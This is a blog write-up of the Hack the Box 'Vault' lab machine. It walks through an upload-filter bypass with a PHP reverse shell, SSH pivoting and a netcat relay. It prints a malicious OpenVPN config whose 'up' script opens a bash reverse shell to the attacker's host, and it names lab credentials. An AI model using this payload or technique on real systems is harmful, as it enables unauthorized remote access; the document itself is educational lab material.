6 min read
April 10, 2019

Hack the Box Writeup: Vault

This was an awesome multi-layered machine that taught me a lot so I loved it! I'm sure there are easier, better and more efficient ways to complete this box but this is how I did it.

Nmap scan to start:

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I add vault.htb to my /etc/hosts and try the http server:

I wasted some time poking around sparklays.com and probably got my IP added to a blacklist (hello FBI!). After I figured out that was a rabbit hole, I ran dirb http://vault.htb and got nothing. I tried http://vault.htb/sparklays only to get a forbidden message which at least let me know it existed. I then ran dirb http://vault.htb/sparklays which found a 'design' and 'design/uploads' folder

Both of the directories found were forbidden. I'm a bit ashamed to say I was stuck here for a bit. Up until this point, dirb had always gotten me the results I needed and I stayed with it because it was easy - easy to remember and easy to type. I flailed around for a while trying different wordlists and getting nowhere. I had heard of gobuster but never really tried it until now. gobuster -h let me know it could search for specified file extensions which is very useful.

Know your tools! *facepalm* 

With some experimentation I got some promising info:

Of course I went after admin.php first but it appeared to be a red herring. No error messages or anything no matter what I tried:

Ok, let's try out gobuster again:

/design/design.html - duh.

The design.html page has a link to change a logo:

Clicking on that link brings you to a page that lets you upload a file:

I took pentestmonkey's php reverse shell, added a .jpg extension to it and was able to upload it as rs.php.jpg. Unfortunately I could not access it no matter what I tried - full filename, rs.php%00, nothing worked.

The file upload filter had to be going by extension only and not content, otherwise it would have rejected my upload. A googling away I went and found a list of valid php extensions.

I uploaded rs.php5 successfully, accessed it through http://vault.htb/sparklays/design/uploads/rs.php5 and got a reverse shell:

Found some interesting files in /home/dave/Desktop:

With the creds in 'ssh' I now have a stable shell:

Aaah, the ability to hit control-c

nmap is not installed on 'ubuntu' so let's do some dynamic port forwarding:

Now to use proxychains to run nmap on 192.168.122.4, the IP for "DNS + Configurator" found in Dave's home directory:

After making some changes to Firefox to use 127.0.0.1:8181 as a proxy server, I can now access http://192.168.122.4:

The 'DNS Settings' link didn't work but the VPN config one does:

I failed at this for a while then ran dirb to find a 'notes' directory:

Let's see what those files are:

I had read a security alert some time ago about malicious openvpn files running code but couldn't remember the details so a googling away I went. This article refreshed my memory and gave away the solution.

I input the below into the VPN config page:

remote 192.168.122.1
dev tun
nobind
script-security 2
up '/bin/bash -c "/bin/bash -i > /dev/tcp/192.168.122.1/4444 0<&1 2>&1&"'

With a netcat listener on 4444, I now have root access to the DNS machine:

Here we find the user flag:

We find an interesting file in /home/dave:

Dave is a bad user. Do not be like Dave.

Those creds work and now I have a stable shell to 192.168.122.4:

Dave does have sudo access which is convenient but ultimately not needed.

While enumerating the system, I find the IP for Vault:

Nmap is installed on the machine so I run it and get a stop sign:

I was stuck here for quite a while. Eventually I figured the creator must have made nmap available for a reason so took a closer look at the options and saw this:

Know your tools, lesson 2 :/

I'd seen that screen a million times but always skipped over the source port option. *facepalm x2*

After a whole lot of failing, I try nmap with a source port of 53 - who doesn't let DNS in right?

Going off that, I do the same thing with netcat to see what's on port 987:

Yum, ssh server

Some more googling and I find this fantastic article about netcat relays which explains the below better than I could (seriously, read it):

First I create the backpipe:

Then setup the relay:

Finally we connect. It turns out Dave, being the bad user he is, reused his password dav3gerous567:

The root key is in his home directory but encrypted:

Of course there are no easy wins:

I remember that 'key' file found in Dave's home directory on the 'ubuntu' machine and figure I probably need to get root.txt.gpg over there.

I use scp to transfer the file from Vault to DNS:

Scp again to transfer from DNS to Ubuntu:

Damn typos

Finally I'm able to decrypt for the root flag using the 'key' file found near the beginning (itscominghome)